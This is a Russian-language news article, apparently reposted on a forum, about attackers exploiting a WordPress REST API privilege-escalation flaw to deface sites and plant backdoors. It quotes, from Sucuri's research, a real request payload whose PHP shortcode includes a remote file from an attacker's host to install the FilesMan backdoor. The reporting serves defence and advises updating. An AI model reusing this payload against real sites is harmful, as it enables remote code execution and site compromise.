Атаки на уязвимость в WordPress REST API используются для установки бэкдоров

[DzSoft]

Массовые атаки на свежую уязвимость в WordPress REST API, исправленную в конце января 2017 года, продолжаются. На прошлой неделе мы Для просмотра ссылки Войди или Зарегистрируйся, что по данным компании WordFence, уязвимость привлекла внимание как минимум 20 хакерских групп, которым удалось скомпрометировать более 1,5 млн страниц. В настоящий момент количество пострадавших страниц перевалило за два миллиона, а атаки постепенно становятся серьезнее, как и прогнозировали специалисты.

Напомню, что свежая уязвимость была устранена с выходом Для просмотра ссылки Войди или Зарегистрируйся, еще 26 января 2017 года. Баг обнаружили специалисты компании Sucuri, и они Для просмотра ссылки Войди или Зарегистрируйсяего как неавторизованную эскалацию привилегий через REST API. Уязвимости подвержены версии 4.7.0 и 4.7.1. Однако публичное раскрытие информации о проблеме состоялось только неделю спустя, так как разработчики хотели, чтобы как можно больше сайтов спокойно установили обновления.


Уязвимость позволяет неавторизованному атакующему сформировать специальный запрос, при помощи которого можно будет изменять и удалять содержимое любого поста на целевом сайте. Кроме того, используя шорткоды плагинов, злоумышленник может эксплуатировать и другие уязвимости CMS, которые обычно недоступны даже пользователям с высокими привилегиями. В итоге атакующий может внедрить на страницы сайта SEO-спам, рекламу, и даже исполняемый PHP-код, все зависит от доступных плагинов.

Эксперты компании Sucuri Для просмотра ссылки Войди или Зарегистрируйся, что от простых дефейсов злоумышленники перешли к попыткам удаленного выполнения произвольного кода. Для этих целей хакеры используют плагины Для просмотра ссылки Войди или Зарегистрируйся (100 000+ установок), Для просмотра ссылки Войди или Зарегистрируйся (100 000+ установок) и им подобные. Такие плагины позволяют внедрять PHP-код в посты, чтобы сделать кастомизацию проще.

Исследователи пишут, что теперь дефейс-сообщения хакеров содержат шорткоды для вышеупомянутых плагинов. То есть добавив к своим дефейсам PHP-код, злоумышленники могут добиться его выполнения. В блоге компании эксперты приводят следующий пример, замеченный ими в ходе изучения атак:

content:»[insert_php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/insert_php]

 include(‘http[:]//acommeamour.fr/tmp/xx.php’);

»,
«id»:»61a»}

Данный пример приводит к скачиванию бэкдора FilesMan и его установке в директорию /wp-content/uploads/.

Теперь специалисты Sucuri рекомендуют администраторам отключить все потенциально опасные плагины и обновиться до WordPress 4.7.2, если они по какой-то причине еще этого не сделали. Исследователи поясняют, что такие атаки – это способ монетизации уязвимости. Тогда как обычными дефейсами много не заработаешь, размещение бекдора на сервере жертвы позволяет злоумышленникам вернуться позже, даже после устранения оригинальной уязвимости, и разместить на скомпрометированном ресурсе SEO-спам, рекламу или малварь.

Источник: Для просмотра ссылки Войди или Зарегистрируйся